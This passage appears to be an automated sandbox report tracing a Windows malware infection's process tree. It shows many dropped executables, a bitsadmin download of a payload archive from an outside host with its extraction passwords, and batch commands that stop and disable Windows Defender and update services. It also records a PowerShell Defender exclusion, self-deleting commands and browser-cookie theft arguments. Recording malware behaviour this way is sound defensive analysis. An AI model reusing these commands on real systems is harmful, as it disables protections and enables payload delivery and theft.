    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\is-N099K.tmp\alpATCHInO.exe
      "C:\Users\Admin\AppData\Local\Temp\is-N099K.tmp\alpATCHInO.exe" /S /UID=lab214
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:2260
    - - C:\Program Files\Windows Photo Viewer\MQJLMAMIIG\prolab.exe
        
        "C:\Program Files\Windows Photo Viewer\MQJLMAMIIG\prolab.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        
        PID:3996
      - C:\Users\Admin\AppData\Local\Temp\is-BEJPA.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BEJPA.tmp\prolab.tmp" /SL5="$B005A,575243,216576,C:\Program Files\Windows Photo Viewer\MQJLMAMIIG\prolab.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:3888
    - - C:\Users\Admin\AppData\Local\Temp\d0-e5a41-704-400a3-f0cbecca760dc\Wibekizheny.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d0-e5a41-704-400a3-f0cbecca760dc\Wibekizheny.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4680
    - - C:\Users\Admin\AppData\Local\Temp\d7-e4561-709-c05a9-d68eecb34408e\Kudyhuvaqae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d7-e4561-709-c05a9-d68eecb34408e\Kudyhuvaqae.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1816
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0a0ci4fw.htl\gpooe.exe & exit
        6⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\0a0ci4fw.htl\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\0a0ci4fw.htl\gpooe.exe
        7⤵
        Executes dropped EXE
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        Executes dropped EXE
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        Executes dropped EXE
        
        PID:5760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3x4jjcg.2ea\google-game.exe & exit
        6⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\g3x4jjcg.2ea\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\g3x4jjcg.2ea\google-game.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2892
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
        8⤵
        Loads dropped DLL
        
        PID:4224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3tvlwpjx.zhq\askinstall31.exe & exit
        6⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\3tvlwpjx.zhq\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\3tvlwpjx.zhq\askinstall31.exe
        7⤵
        Executes dropped EXE
        
        PID:5560
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:6976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe & exit
        6⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7028
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe"
        8⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        9⤵
        Delays execution with timeout.exe
        
        PID:5892
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zg5mbowr.ucu\setup_10.2_mix.exe & exit
        6⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\zg5mbowr.ucu\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\zg5mbowr.ucu\setup_10.2_mix.exe
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
        8⤵
        Checks computer location settings
        
        PID:4308
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe & exit
        6⤵
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6984
        
        C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:2152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wnkl3t3.exu\GcleanerWW.exe /mixone & exit
        6⤵
        
        PID:6136
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\le3rhmbb.1ld\SunLabsPlayer.exe /S & exit
        6⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\le3rhmbb.1ld\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\le3rhmbb.1ld\SunLabsPlayer.exe /S
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:6584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:6352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:3760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:4732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        8⤵
        Download via BitsAdmin
        
        PID:6748
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pDt6jSNcZxeVPrNO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        8⤵
        
        PID:5972
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pWpIalMzwHLWFuk9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        8⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:6880
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AluokRqxGvyM\AluokRqxGvyM.dll" AluokRqxGvyM
        8⤵
        
        PID:2460
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AluokRqxGvyM\AluokRqxGvyM.dll" AluokRqxGvyM
        9⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:4900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:5668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:6724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
        8⤵
        
        PID:4072
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        8⤵
        
        PID:5628
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ct3ubhmy.5ex\df4e3841.exe & exit
        6⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\ct3ubhmy.5ex\df4e3841.exe
        
        C:\Users\Admin\AppData\Local\Temp\ct3ubhmy.5ex\df4e3841.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        
        PID:2160
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe /8-2222 & exit
        6⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe /8-2222
        7⤵
        Executes dropped EXE
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe" /8-2222
        8⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:7152
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 832
        8⤵
        Program crash
        
        PID:7076
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Users\Admin\AppData\Local\Temp\is-44NSP.tmp\lylal220.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-44NSP.tmp\lylal220.tmp" /SL5="$1020C,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:716
  - - C:\Users\Admin\AppData\Local\Temp\is-I1HOD.tmp\ysAGEL.exe
      "C:\Users\Admin\AppData\Local\Temp\is-I1HOD.tmp\ysAGEL.exe" /S /UID=lylal220
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4188
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\ProgramData\7503414.exe
    "C:\ProgramData\7503414.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1280
- - C:\ProgramData\3648716.exe
    "C:\ProgramData\3648716.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2444
  - - C:\ProgramData\Windows Host\Windows Host.exe
      "C:\ProgramData\Windows Host\Windows Host.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: SetClipboardViewer
      PID:4256
- - C:\ProgramData\1706868.exe
    "C:\ProgramData\1706868.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:4352
  - - C:\ProgramData\1706868.exe
      "{path}"
      4⤵
      Executes dropped EXE
      PID:6620
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3656 -s 1756
    3⤵
    - Program crash
    PID:1808
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\ProgramData\2520276.exe
    "C:\ProgramData\2520276.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\ProgramData\6876167.exe
    "C:\ProgramData\6876167.exe"
    3⤵
    - Executes dropped EXE
    PID:388
- - C:\ProgramData\7945204.exe
    "C:\ProgramData\7945204.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
  - - C:\ProgramData\7945204.exe
      "{path}"
      4⤵
      Executes dropped EXE
      PID:6628
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:988
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
      4⤵
      Loads dropped DLL
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2800
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LOQn7WyBrhly.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LOQn7WyBrhly.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:6136

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5656

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6344

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5192

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4872

C:\Users\Admin\AppData\Local\Temp\6CF3.exe
C:\Users\Admin\AppData\Local\Temp\6CF3.exe
1⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\6F17.exe
C:\Users\Admin\AppData\Local\Temp\6F17.exe
1⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\86A7.exe
C:\Users\Admin\AppData\Local\Temp\86A7.exe
1⤵
PID:5224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\86A7.exe"
  2⤵
  PID:6376
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:5876

C:\Users\Admin\AppData\Local\Temp\8D5F.exe
C:\Users\Admin\AppData\Local\Temp\8D5F.exe
1⤵
PID:5064
- C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\test.bat"
    3⤵
    PID:4956
  - - C:\Windows\system32\sc.exe
      sc stop windefend
      4⤵
      PID:6788
  - - C:\Windows\system32\sc.exe
      sc config windefend start= disabled
      4⤵
      Checks for any installed AV software in registry
      PID:7044
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      PID:6616
  - - C:\Windows\system32\sc.exe
      sc config Sense start= disabled
      4⤵
      PID:3808
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      PID:7132
  - - C:\Windows\system32\sc.exe
      sc config wuauserv start= disabled
      4⤵
      PID:900
  - - C:\Windows\system32\sc.exe
      sc stop usosvc
      4⤵
      PID:6672
  - - C:\Windows\system32\sc.exe
      sc config usosvc start= disabled
      4⤵
      PID:6392
  - - C:\Windows\system32\sc.exe
      sc stop WaasMedicSvc
      4⤵
      PID:6152
  - - C:\Windows\system32\sc.exe
      sc config WaasMedicSvc start= disabled
      4⤵
      PID:6792
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      PID:5248
  - - C:\Windows\system32\sc.exe
      sc config SecurityHealthService start= disabled
      4⤵
      PID:1840
  - - C:\Windows\system32\sc.exe
      sc stop SDRSVC
      4⤵
      PID:2020
  - - C:\Windows\system32\sc.exe
      sc config SDRSVC start= disabled
      4⤵
      PID:6064
  - - C:\Windows\system32\sc.exe
      sc stop wscsvc
      4⤵
      PID:5284
  - - C:\Windows\system32\sc.exe
      sc config wscsvc start= disabled
      4⤵
      PID:6116
  - - C:\Windows\system32\sc.exe
      sc stop WdiServiceHost
      4⤵
      PID:6080
  - - C:\Windows\system32\sc.exe
      sc config WdiServiceHost start= disabled
      4⤵
      PID:6600
  - - C:\Windows\system32\sc.exe
      sc stop WdiSystemHost
      4⤵
      PID:6696
  - - C:\Windows\system32\sc.exe
      sc config WdiSystemHost start= disabled
      4⤵
      PID:6904
  - - C:\Windows\system32\sc.exe
      sc stop InstallService
      4⤵
      PID:5564
  - - C:\Windows\system32\sc.exe
      sc config InstallService Start= disabled
      4⤵
      PID:6228
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8D5F.exe" -Force
  2⤵
  PID:4072
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  - Suspicious behavior: MapViewOfSection
  PID:2160
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:988
- C:\Users\Admin\AppData\Local\Temp\8D5F.exe
  "C:\Users\Admin\AppData\Local\Temp\8D5F.exe"
  2⤵
  PID:636
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 2068
  2⤵
  - Program crash
  PID:4308

C:\Users\Admin\AppData\Local\Temp\8FB2.exe
C:\Users\Admin\AppData\Local\Temp\8FB2.exe
1⤵
PID:5840
- C:\Users\Admin\AppData\Local\Temp\1858561392.exe
  "C:\Users\Admin\AppData\Local\Temp\1858561392.exe"
  2⤵
  PID:5968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:2248
- C:\Users\Admin\AppData\Local\Temp\1676891015.exe
  "C:\Users\Admin\AppData\Local\Temp\1676891015.exe"
  2⤵
  PID:6976
- - C:\Users\Admin\AppData\Local\Temp\1676891015.exe
    "C:\Users\Admin\AppData\Local\Temp\1676891015.exe"
    3⤵
    PID:5720

C:\Users\Admin\AppData\Local\Temp\938B.exe
C:\Users\Admin\AppData\Local\Temp\938B.exe
1⤵
PID:6828

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6040

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2292

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7160

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1704

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6084

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5912

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4592

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5492

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3956

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\1A7F.exe
C:\Users\Admin\AppData\Local\Temp\1A7F.exe
1⤵
PID:5680
- C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\test.bat"
    3⤵
    PID:5820
  - - C:\Windows\system32\sc.exe
      sc stop windefend
      4⤵
      PID:6624
  - - C:\Windows\system32\sc.exe
      sc config windefend start= disabled
      4⤵
      PID:6332
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      PID:5568
  - - C:\Windows\system32\sc.exe
      sc config Sense start= disabled
      4⤵
      PID:5732
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      PID:6296
  - - C:\Windows\system32\sc.exe
      sc config wuauserv start= disabled
      4⤵
      PID:5840
  - - C:\Windows\system32\sc.exe
      sc stop usosvc
      4⤵
      PID:4644
  - - C:\Windows\system32\sc.exe
      sc config usosvc start= disabled
      4⤵
      PID:1840
